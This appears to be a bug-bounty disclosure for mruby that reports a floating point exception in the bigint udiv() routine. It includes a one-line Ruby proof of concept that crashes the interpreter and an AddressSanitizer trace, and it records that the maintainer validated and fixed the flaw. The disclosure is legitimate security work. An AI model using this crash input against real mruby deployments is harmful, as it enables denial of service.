Floating point exception in mruby/mruby


Reported on

Aug 24th 2022


Floating point exception in udiv()

commit : b83285697888abbcb2286462da070d49f413ab24

Proof of Concept

(1 << 63).pow(1, 0)

ASAN Output

==747==ERROR: AddressSanitizer: FPE on unknown address 0x5626e07f6dba (pc 0x5626e07f6dba bp 0x6020000030b8 sp 0x7ffdcd994ab0 T0)
    #0 0x5626e07f6db9 in udiv /home/bottom/fuzz/mruby/mrbgems/mruby-bigint/core/bigint.c:470
    #1 0x5626e07f8072 in mpz_mod /home/bottom/fuzz/mruby/mrbgems/mruby-bigint/core/bigint.c:597
    #2 0x5626e07f885b in mpz_powm /home/bottom/fuzz/mruby/mrbgems/mruby-bigint/core/bigint.c:967
    #3 0x5626e0800323 in mrb_bint_powm /home/bottom/fuzz/mruby/mrbgems/mruby-bigint/core/bigint.c:1385
    #4 0x5626e0899700 in int_powm /home/bottom/fuzz/mruby/mrbgems/mruby-numeric-ext/src/numeric_ext.c:71
    #5 0x5626e075dd81 in mrb_vm_exec /home/bottom/fuzz/mruby/src/vm.c:1750
    #6 0x5626e0784ad2 in mrb_vm_run /home/bottom/fuzz/mruby/src/vm.c:1226
    #7 0x5626e0849b76 in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6912
    #8 0x5626e084f57c in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6955
    #9 0x5626e071a2eb in main /home/bottom/fuzz/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357
    #10 0x7f71a3a0c0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #11 0x5626e071c11d in _start (/ctf/mruby_asan+0xc411d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: FPE /home/bottom/fuzz/mruby/mrbgems/mruby-bigint/core/bigint.c:470 in udiv

Test Platform

Ubuntu 20.04.4 LTS


Denial of Service

We are processing your report and will contact the mruby team within 24 hours. a month ago
bottom modified the report
a month ago
We have contacted a member of the mruby team and are waiting to hear back a month ago
Yukihiro "Matz" Matsumoto validated this vulnerability a month ago
bottom has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on ef1974 a month ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
a month ago


Is there cve id for it?

to join this conversation